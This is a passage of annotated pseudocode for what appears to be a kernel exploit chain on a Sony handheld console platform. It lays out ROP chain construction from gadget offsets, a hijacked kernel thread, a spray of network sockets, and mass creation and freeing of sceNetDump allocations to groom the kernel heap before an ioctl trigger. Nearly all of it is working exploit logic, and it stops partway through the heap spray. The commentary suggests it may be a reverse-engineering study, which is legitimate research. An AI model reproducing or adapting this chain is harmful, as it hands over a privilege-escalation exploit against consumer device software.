0x00(x_stack + 0x00008D04) = 0x00(x_stack + 0x00008464) + 0x000050E9
0x00(x_stack + 0x00008D08) = 0x00(x_stack + 0x00008464) + 0x0000AF33
0x00(x_stack + 0x00008D0C) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008D10) = 0x00(x_stack + 0x00008464) + 0x0001D9EB
0x00(x_stack + 0x00008D14) = 0x00000000
0x00(x_stack + 0x00008D18) = 0x00(x_stack + 0x00008464) + 0x0001FC6D
0x00(x_stack + 0x00008D1C) = 0x00(x_stack + 0x00008464) + 0x0000EA73
0x00(x_stack + 0x00008D20) = 0x00(x_stack + 0x00008464) + 0x0000039B
0x00(x_stack + 0x00008D24) = 0x00(x_stack + 0x00008464) + 0x00000853
0x00(x_stack + 0x00008D28) = 0xFFFFFFFF
0x00(x_stack + 0x00008D2C) = 0x08106803
0x00(x_stack + 0x00008D30) = 0x00(x_stack + 0x00008464) + 0x000233D3
0x00(x_stack + 0x00008D34) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008D38) = 0x00(x_stack + 0x00008464) + 0x00000433
0x00(x_stack + 0x00008D3C) = 0x00(x_stack + 0x00008464) + 0x000233D3
0x00(x_stack + 0x00008D40) = 0x00(x_stack + 0x00008464) + 0x000150A3
0x00(x_stack + 0x00008D44) = 0x00000000
0x00(x_stack + 0x00008D48) = 0x00(x_stack + 0x00008464) + 0x0000A74D
0x00(x_stack + 0x00008D4C) = 0x00(x_stack + 0x00008464) + 0x00000000
0x00(x_stack + 0x00008D50) = 0x00(x_stack + 0x00008464) + 0x00000853
0x00(x_stack + 0x00008D54) = 0x00(x_stack + 0x00008464) + 0x0001BF1F
0x00(x_stack + 0x00008D58) = 0x00000000
0x00(x_stack + 0x00008D5C) = 0x00(x_stack + 0x00008464) + 0x00001605
0x00(x_stack + 0x00008D60) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008D64) = 0x00(x_stack + 0x00008464) + 0x000050E9
0x00(x_stack + 0x00008D68) = 0x00(x_stack + 0x00008464) + 0x00001605
0x00(x_stack + 0x00008D6C) = 0x00(x_stack + 0x00008464) + 0x00022FCD
0x00(x_stack + 0x00008D70) = 0x00(x_stack + 0x00008464) + 0x000039EB
0x00(x_stack + 0x00008D74) = 0x00(x_stack + 0x00008464) + 0x00000853
0x00(x_stack + 0x00008D78) = 0x00(x_stack + 0x00008464) + 0x00011C5F

// Overwrite specific NULLs in the ROP chain
0x00(x_stack + 0x00008C04) = 0x00(x_stack + 0x00008EAC)
0x00(x_stack + 0x00008B48) = 0x00000090
0x00(x_stack + 0x00008CC0) = 0x00000240
0x00(x_stack + 0x00008D58) = 0x00000200
0x00(x_stack + 0x00008D14) = 0x00008FC0

// Copy kernel ROP chain
memcpy(x_stack + 0x00007448, x_stack + 0x00008A8C, 0x300);

// Copy the first 0x400 bytes of "obfuscated" data
// and append them at the bottom of the ROP chain
memcpy(x_stack + 0x00007744, x_stack + 0x00008EB8, 0x400);

// Set kernel thread SP, PC, UNK
0x00(x_stack + 0x00008858) = 0x00(x_stack + 0x00008458) + 0x000006DC
0x00(x_stack + 0x0000884C) = 0x00(x_stack + 0x00008458) + 0x000006F8 + 0x00000004
0x00(x_stack + 0x00008850) = 0x00(x_stack + 0x00008464) + 0x00000347

// Create "mhm" thread
// "mhm" == "move heap memory"?
// Entry (0x000054C8): LDMIA R1, {R1,R2,R4,R8,R11,SP,PC}
int thread_id = sceKernelCreateThread("mhm", 0x000054C8, 0x10000100, 0x00002000, 0x00000000, 0x00000000, 0x00000000);

// Store "mhm" thread's ID
0x00(x_stack + 0x00008620) = thread_id

// Store SceKernelThreadInfo size
0x00(x_stack + 0x0000862C) = 0x0000007C

// Get "mhm" thread's info structure
sceKernelGetThreadInfo(thread_id, x_stack + 0x0000862C);

// Store mhm_threadinfo.stack + 0x00001000
0x00(x_stack + 0x000086FC) = 0x00(x_stack + 0x00008660) + 0x00001000

// Spam sceNetSocket requests
// sceNetSocket("x", AF_INET, SOCK_STREAM, 0);
0x00(x_stack + 0x00008470) = sceNetSocket(x_stack + 0x00010388, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008474) = sceNetSocket(x_stack + 0x00010390, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008478) = sceNetSocket(x_stack + 0x00010398, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x0000847C) = sceNetSocket(x_stack + 0x000103A0, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008480) = sceNetSocket(x_stack + 0x000103A8, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008484) = sceNetSocket(x_stack + 0x000103B0, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008488) = sceNetSocket(x_stack + 0x000103B8, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x0000848C) = sceNetSocket(x_stack + 0x000103C0, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008490) = sceNetSocket(x_stack + 0x000103C8, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008494) = sceNetSocket(x_stack + 0x000103D0, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008498) = sceNetSocket(x_stack + 0x000103D8, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x0000849C) = sceNetSocket(x_stack + 0x000103E0, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084A0) = sceNetSocket(x_stack + 0x000103E8, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084A4) = sceNetSocket(x_stack + 0x000103F0, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084A8) = sceNetSocket(x_stack + 0x000103F8, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084AC) = sceNetSocket(x_stack + 0x00010400, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084B0) = sceNetSocket(x_stack + 0x00010408, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084B4) = sceNetSocket(x_stack + 0x00010410, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084B8) = sceNetSocket(x_stack + 0x00010418, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084BC) = sceNetSocket(x_stack + 0x00010420, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084C0) = sceNetSocket(x_stack + 0x00010428, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084C4) = sceNetSocket(x_stack + 0x00010430, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084C8) = sceNetSocket(x_stack + 0x00010438, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084CC) = sceNetSocket(x_stack + 0x00010440, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084D0) = sceNetSocket(x_stack + 0x00010448, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084D4) = sceNetSocket(x_stack + 0x00010450, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084D8) = sceNetSocket(x_stack + 0x00010458, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084DC) = sceNetSocket(x_stack + 0x00010460, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084E0) = sceNetSocket(x_stack + 0x00010468, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084E4) = sceNetSocket(x_stack + 0x00010470, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084E8) = sceNetSocket(x_stack + 0x00010478, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084EC) = sceNetSocket(x_stack + 0x00010480, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084F0) = sceNetSocket(x_stack + 0x00010488, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084F4) = sceNetSocket(x_stack + 0x00010490, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084F8) = sceNetSocket(x_stack + 0x00010498, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084FC) = sceNetSocket(x_stack + 0x000104A0, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008500) = sceNetSocket(x_stack + 0x000104A8, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008504) = sceNetSocket(x_stack + 0x000104B0, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008508) = sceNetSocket(x_stack + 0x000104B8, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x0000850C) = sceNetSocket(x_stack + 0x000104C0, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008510) = sceNetSocket(x_stack + 0x000104C8, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008514) = sceNetSocket(x_stack + 0x000104D0, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008518) = sceNetSocket(x_stack + 0x000104D8, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x0000851C) = sceNetSocket(x_stack + 0x000104E0, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008520) = sceNetSocket(x_stack + 0x000104E8, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008524) = sceNetSocket(x_stack + 0x000104F0, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008528) = sceNetSocket(x_stack + 0x000104F8, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x0000852C) = sceNetSocket(x_stack + 0x00010500, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008530) = sceNetSocket(x_stack + 0x00010508, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008534) = sceNetSocket(x_stack + 0x00010510, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008538) = sceNetSocket(x_stack + 0x00010518, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x0000853C) = sceNetSocket(x_stack + 0x00010520, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008540) = sceNetSocket(x_stack + 0x00010528, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008544) = sceNetSocket(x_stack + 0x00010530, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008548) = sceNetSocket(x_stack + 0x00010538, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x0000854C) = sceNetSocket(x_stack + 0x00010540, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008550) = sceNetSocket(x_stack + 0x00010548, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008554) = sceNetSocket(x_stack + 0x00010550, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008558) = sceNetSocket(x_stack + 0x00010558, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x0000855C) = sceNetSocket(x_stack + 0x00010560, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008560) = sceNetSocket(x_stack + 0x00010568, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008564) = sceNetSocket(x_stack + 0x00010570, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008568) = sceNetSocket(x_stack + 0x00010578, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x0000856C) = sceNetSocket(x_stack + 0x00010580, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008570) = sceNetSocket(x_stack + 0x00010588, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008574) = sceNetSocket(x_stack + 0x00010590, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008578) = sceNetSocket(x_stack + 0x00010598, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x0000857C) = sceNetSocket(x_stack + 0x000105A0, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008580) = sceNetSocket(x_stack + 0x000105A8, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008584) = sceNetSocket(x_stack + 0x000105B0, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008588) = sceNetSocket(x_stack + 0x000105B8, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x0000858C) = sceNetSocket(x_stack + 0x000105C0, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008590) = sceNetSocket(x_stack + 0x000105C8, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008594) = sceNetSocket(x_stack + 0x000105D0, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008598) = sceNetSocket(x_stack + 0x000105D8, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x0000859C) = sceNetSocket(x_stack + 0x000105E0, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000085A0) = sceNetSocket(x_stack + 0x000105E8, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000085A4) = sceNetSocket(x_stack + 0x000105F0, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000085A8) = sceNetSocket(x_stack + 0x000105F8, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000085AC) = sceNetSocket(x_stack + 0x00010600, 0x00000002, 0x00000001, 0x00000000);

// sceNetSocket("sss", AF_INET, SOCK_STREAM, 0);
0x00(x_stack + 0x000085B8) = sceNetSocket(x_stack + 0x00010608, 0x00000002, 0x00000001, 0x00000000);

// sceNetSocket("tst", AF_INET, 0x7, 0);
0x00(x_stack + 0x000085C4) = sceNetSocket(x_stack + 0x00010614, 0x00000002, 0x00000007, 0x00000000);

// Setup "mhm" ROP
0x00(x_stack + 0x00008708) = 0x008DD9B5;
0x00(x_stack + 0x0000870C) = 0x000085C4;
0x00(x_stack + 0x00008710) = 0x10007300;
0x00(x_stack + 0x00008714) = 0x00000000;
0x00(x_stack + 0x00008718) = 0x00000000;
0x00(x_stack + 0x0000871C) = 0x00009F90;
0x00(x_stack + 0x00008720) = 0x00000000;
0x00(x_stack + 0x00008724) = 0x000FCDBB;
0x00(x_stack + 0x00008728) = 0x00008810;
0x00(x_stack + 0x0000872C) = 0x000059A9;
0x00(x_stack + 0x00008730) = 0x00000000;
0x00(x_stack + 0x00008734) = 0x00000519;

/* "mhm" ROP

// Issue an IOCtl to "tst" FD
int ioctl_res = sceNetSyscallIoctl(x_stack + 0x000085C4, 0x10007300, 0x00000000);

// Store IOCtl result
0x00(x_stack + 0x00008810) = ioctl_res;

// Deadlock
sceWebkit_519();

*/

// Copy "mhm" ROP chain into "mhm" thread's stack
memcpy(0x00(x_stack + 0x000086FC), x_stack + 0x00008708, 0x00000100);

// Set stack pointer
0x00(x_stack + 0x00008830) = x_stack + 0x000086FC;

// Set PC
0x00(x_stack + 0x00008834) = 0x000C048B; // POP {PC}

// sceNetSocket("tmp", AF_INET, SOCK_STREAM, 0);
0x00(x_stack + 0x000085D0) = sceNetSocket(x_stack + 0x00010620, 0x00000002, 0x00000001, 0x00000000);

// Create several net dumps
// sceNetDumpCreate("ddd", 0x00000F00, 0x00000000);
0x00(x_stack + 0x000085F4) = sceNetDumpCreate(x_stack + 0x0001062C, 0x00000F00, 0x00000000);
0x00(x_stack + 0x000085F8) = sceNetDumpCreate(x_stack + 0x00010638, 0x00000F00, 0x00000000);
0x00(x_stack + 0x000085FC) = sceNetDumpCreate(x_stack + 0x00010644, 0x00000F00, 0x00000000);
0x00(x_stack + 0x00008600) = sceNetDumpCreate(x_stack + 0x00010650, 0x00000F00, 0x00000000);
0x00(x_stack + 0x00008604) = sceNetDumpCreate(x_stack + 0x0001065C, 0x00000F00, 0x00000000);
0x00(x_stack + 0x00008608) = sceNetDumpCreate(x_stack + 0x00010668, 0x00000F00, 0x00000000);
0x00(x_stack + 0x0000860C) = sceNetDumpCreate(x_stack + 0x00010674, 0x00000F00, 0x00000000);
0x00(x_stack + 0x00008610) = sceNetDumpCreate(x_stack + 0x00010680, 0x00000F00, 0x00000000);
0x00(x_stack + 0x00008614) = sceNetDumpCreate(x_stack + 0x0001068C, 0x00000F00, 0x00000000);
0x00(x_stack + 0x000085E8) = sceNetDumpCreate(x_stack + 0x00010698, 0x00000F00, 0x00000000);
0x00(x_stack + 0x000085DC) = sceNetDumpCreate(x_stack + 0x000106A4, 0x00001000, 0x00000000);

// Destroy some dumps
sceNetDumpDestroy(x_stack + 0x000085F4);
sceNetDumpDestroy(x_stack + 0x000085FC);
sceNetDumpDestroy(x_stack + 0x00008604);
sceNetDumpDestroy(x_stack + 0x0000860C);
sceNetDumpDestroy(x_stack + 0x00008614);
sceNetDumpDestroy(x_stack + 0x000085E8);

// Create more net dumps
sceNetDumpCreate(x_stack + 0x000106B0, 0x000D0000, 0x00000000); sceNetDumpCreate(x_stack + 0x000106BC, 0x000CFF00, 0x00000000); sceNetDumpCreate(x_stack + 0x000106C8, 0x000CFE00, 0x00000000); sceNetDumpCreate(x_stack + 0x000106D4, 0x000CFD00, 0x00000000); sceNetDumpCreate(x_stack + 0x000106E0, 0x000CFC00, 0x00000000); sceNetDumpCreate(x_stack + 0x000106EC, 0x000CFB00, 0x00000000); sceNetDumpCreate(x_stack + 0x000106F8, 0x000CFA00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010704, 0x000CF900, 0x00000000); sceNetDumpCreate(x_stack + 0x00010710, 0x000CF800, 0x00000000); sceNetDumpCreate(x_stack + 0x0001071C, 0x000CF700, 0x00000000); sceNetDumpCreate(x_stack + 0x00010728, 0x000CF600, 0x00000000); sceNetDumpCreate(x_stack + 0x00010734, 0x000CF500, 0x00000000); sceNetDumpCreate(x_stack + 0x00010740, 0x000CF400, 0x00000000); sceNetDumpCreate(x_stack + 0x0001074C, 0x000CF300, 0x00000000); sceNetDumpCreate(x_stack + 0x00010758, 0x000CF200, 0x00000000); sceNetDumpCreate(x_stack + 0x00010764, 0x000CF100, 0x00000000); sceNetDumpCreate(x_stack + 0x00010770, 0x000CF000, 0x00000000); sceNetDumpCreate(x_stack + 0x0001077C, 0x000CEF00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010788, 0x000CEE00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010794, 0x000CED00, 0x00000000); sceNetDumpCreate(x_stack + 0x000107A0, 0x000CEC00, 0x00000000); sceNetDumpCreate(x_stack + 0x000107AC, 0x000CEB00, 0x00000000); sceNetDumpCreate(x_stack + 0x000107B8, 0x000CEA00, 0x00000000); sceNetDumpCreate(x_stack + 0x000107C4, 0x000CE900, 0x00000000); sceNetDumpCreate(x_stack + 0x000107D0, 0x000CE800, 0x00000000); sceNetDumpCreate(x_stack + 0x000107DC, 0x000CE700, 0x00000000); sceNetDumpCreate(x_stack + 0x000107E8, 0x000CE600, 0x00000000); sceNetDumpCreate(x_stack + 0x000107F4, 0x000CE500, 0x00000000); sceNetDumpCreate(x_stack + 0x00010800, 0x000CE400, 0x00000000); sceNetDumpCreate(x_stack + 0x0001080C, 0x000CE300, 0x00000000); sceNetDumpCreate(x_stack + 0x00010818, 0x000CE200, 
0x00000000); sceNetDumpCreate(x_stack + 0x00010824, 0x000CE100, 0x00000000); sceNetDumpCreate(x_stack + 0x00010830, 0x000CE000, 0x00000000); sceNetDumpCreate(x_stack + 0x0001083C, 0x000CDF00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010848, 0x000CDE00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010854, 0x000CDD00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010860, 0x000CDC00, 0x00000000); sceNetDumpCreate(x_stack + 0x0001086C, 0x000CDB00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010878, 0x000CDA00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010884, 0x000CD900, 0x00000000); sceNetDumpCreate(x_stack + 0x00010890, 0x000CD800, 0x00000000); sceNetDumpCreate(x_stack + 0x0001089C, 0x000CD700, 0x00000000); sceNetDumpCreate(x_stack + 0x000108A8, 0x000CD600, 0x00000000); sceNetDumpCreate(x_stack + 0x000108B4, 0x000CD500, 0x00000000); sceNetDumpCreate(x_stack + 0x000108C0, 0x000CD400, 0x00000000); sceNetDumpCreate(x_stack + 0x000108CC, 0x000CD300, 0x00000000); sceNetDumpCreate(x_stack + 0x000108D8, 0x000CD200, 0x00000000); sceNetDumpCreate(x_stack + 0x000108E4, 0x000CD100, 0x00000000); sceNetDumpCreate(x_stack + 0x000108F0, 0x000CD000, 0x00000000); sceNetDumpCreate(x_stack + 0x000108FC, 0x000CCF00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010908, 0x000CCE00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010914, 0x000CCD00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010920, 0x000CCC00, 0x00000000); sceNetDumpCreate(x_stack + 0x0001092C, 0x000CCB00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010938, 0x000CCA00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010944, 0x000CC900, 0x00000000); sceNetDumpCreate(x_stack + 0x00010950, 0x000CC800, 0x00000000); sceNetDumpCreate(x_stack + 0x0001095C, 0x000CC700, 0x00000000); sceNetDumpCreate(x_stack + 0x00010968, 0x000CC600, 0x00000000); sceNetDumpCreate(x_stack + 0x00010974, 0x000CC500, 0x00000000); sceNetDumpCreate(x_stack + 0x00010980, 0x000CC400, 0x00000000); sceNetDumpCreate(x_stack + 0x0001098C, 0x000CC300, 0x00000000); 
sceNetDumpCreate(x_stack + 0x00010998, 0x000CC200, 0x00000000); sceNetDumpCreate(x_stack + 0x000109A4, 0x000CC100, 0x00000000); sceNetDumpCreate(x_stack + 0x000109B0, 0x000CC000, 0x00000000); sceNetDumpCreate(x_stack + 0x000109BC, 0x000CBF00, 0x00000000); sceNetDumpCreate(x_stack + 0x000109C8, 0x000CBE00, 0x00000000); sceNetDumpCreate(x_stack + 0x000109D4, 0x000CBD00, 0x00000000); sceNetDumpCreate(x_stack + 0x000109E0, 0x000CBC00, 0x00000000); sceNetDumpCreate(x_stack + 0x000109EC, 0x000CBB00, 0x00000000); sceNetDumpCreate(x_stack + 0x000109F8, 0x000CBA00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010A04, 0x000CB900, 0x00000000); sceNetDumpCreate(x_stack + 0x00010A10, 0x000CB800, 0x00000000); sceNetDumpCreate(x_stack + 0x00010A1C, 0x000CB700, 0x00000000); sceNetDumpCreate(x_stack + 0x00010A28, 0x000CB600, 0x00000000); sceNetDumpCreate(x_stack + 0x00010A34, 0x000CB500, 0x00000000); sceNetDumpCreate(x_stack + 0x00010A40, 0x000CB400, 0x00000000); sceNetDumpCreate(x_stack + 0x00010A4C, 0x000CB300, 0x00000000); sceNetDumpCreate(x_stack + 0x00010A58, 0x000CB200, 0x00000000); sceNetDumpCreate(x_stack + 0x00010A64, 0x000CB100, 0x00000000); sceNetDumpCreate(x_stack + 0x00010A70, 0x000CB000, 0x00000000); sceNetDumpCreate(x_stack + 0x00010A7C, 0x000CAF00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010A88, 0x000CAE00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010A94, 0x000CAD00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010AA0, 0x000CAC00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010AAC, 0x000CAB00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010AB8, 0x000CAA00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010AC4, 0x000CA900, 0x00000000); sceNetDumpCreate(x_stack + 0x00010AD0, 0x000CA800, 0x00000000); sceNetDumpCreate(x_stack + 0x00010ADC, 0x000CA700, 0x00000000); sceNetDumpCreate(x_stack + 0x00010AE8, 0x000CA600, 0x00000000); sceNetDumpCreate(x_stack + 0x00010AF4, 0x000CA500, 0x00000000); sceNetDumpCreate(x_stack + 0x00010B00, 0x000CA400, 0x00000000); 
sceNetDumpCreate(x_stack + 0x00010B0C, 0x000CA300, 0x00000000); sceNetDumpCreate(x_stack + 0x00010B18, 0x000CA200, 0x00000000); sceNetDumpCreate(x_stack + 0x00010B24, 0x000CA100, 0x00000000); sceNetDumpCreate(x_stack + 0x00010B30, 0x000CA000, 0x00000000); sceNetDumpCreate(x_stack + 0x00010B3C, 0x000C9F00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010B48, 0x000C9E00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010B54, 0x000C9D00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010B60, 0x000C9C00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010B6C, 0x000C9B00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010B78, 0x000C9A00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010B84, 0x000C9900, 0x00000000); sceNetDumpCreate(x_stack + 0x00010B90, 0x000C9800, 0x00000000); sceNetDumpCreate(x_stack + 0x00010B9C, 0x000C9700, 0x00000000); sceNetDumpCreate(x_stack + 0x00010BA8, 0x000C9600, 0x00000000); sceNetDumpCreate(x_stack + 0x00010BB4, 0x000C9500, 0x00000000); sceNetDumpCreate(x_stack + 0x00010BC0, 0x000C9400, 0x00000000); sceNetDumpCreate(x_stack + 0x00010BCC, 0x000C9300, 0x00000000); sceNetDumpCreate(x_stack + 0x00010BD8, 0x000C9200, 0x00000000); sceNetDumpCreate(x_stack + 0x00010BE4, 0x000C9100, 0x00000000); sceNetDumpCreate(x_stack + 0x00010BF0, 0x000C9000, 0x00000000); sceNetDumpCreate(x_stack + 0x00010BFC, 0x000C8F00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010C08, 0x000C8E00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010C14, 0x000C8D00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010C20, 0x000C8C00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010C2C, 0x000C8B00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010C38, 0x000C8A00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010C44, 0x000C8900, 0x00000000); sceNetDumpCreate(x_stack + 0x00010C50, 0x000C8800, 0x00000000); sceNetDumpCreate(x_stack + 0x00010C5C, 0x000C8700, 0x00000000); sceNetDumpCreate(x_stack + 0x00010C68, 0x000C8600, 0x00000000); sceNetDumpCreate(x_stack + 0x00010C74, 0x000C8500, 0x00000000); 
sceNetDumpCreate(x_stack + 0x00010C80, 0x000C8400, 0x00000000); sceNetDumpCreate(x_stack + 0x00010C8C, 0x000C8300, 0x00000000); sceNetDumpCreate(x_stack + 0x00010C98, 0x000C8200, 0x00000000); sceNetDumpCreate(x_stack + 0x00010CA4, 0x000C8100, 0x00000000); sceNetDumpCreate(x_stack + 0x00010CB0, 0x000C8000, 0x00000000); sceNetDumpCreate(x_stack + 0x00010CBC, 0x000C7F00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010CC8, 0x000C7E00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010CD4, 0x000C7D00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010CE0, 0x000C7C00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010CEC, 0x000C7B00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010CF8, 0x000C7A00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010D04, 0x000C7900, 0x00000000); sceNetDumpCreate(x_stack + 0x00010D10, 0x000C7800, 0x00000000); sceNetDumpCreate(x_stack + 0x00010D1C, 0x000C7700, 0x00000000); sceNetDumpCreate(x_stack + 0x00010D28, 0x000C7600, 0x00000000); sceNetDumpCreate(x_stack + 0x00010D34, 0x000C7500, 0x00000000); sceNetDumpCreate(x_stack + 0x00010D40, 0x000C7400, 0x00000000); sceNetDumpCreate(x_stack + 0x00010D4C, 0x000C7300, 0x00000000); sceNetDumpCreate(x_stack + 0x00010D58, 0x000C7200, 0x00000000); sceNetDumpCreate(x_stack + 0x00010D64, 0x000C7100, 0x00000000); sceNetDumpCreate(x_stack + 0x00010D70, 0x000C7000, 0x00000000); sceNetDumpCreate(x_stack + 0x00010D7C, 0x000C6F00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010D88, 0x000C6E00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010D94, 0x000C6D00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010DA0, 0x000C6C00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010DAC, 0x000C6B00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010DB8, 0x000C6A00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010DC4, 0x000C6900, 0x00000000); sceNetDumpCreate(x_stack + 0x00010DD0, 0x000C6800, 0x00000000); sceNetDumpCreate(x_stack + 0x00010DDC, 0x000C6700, 0x00000000); sceNetDumpCreate(x_stack + 0x00010DE8, 0x000C6600, 0x00000000); 
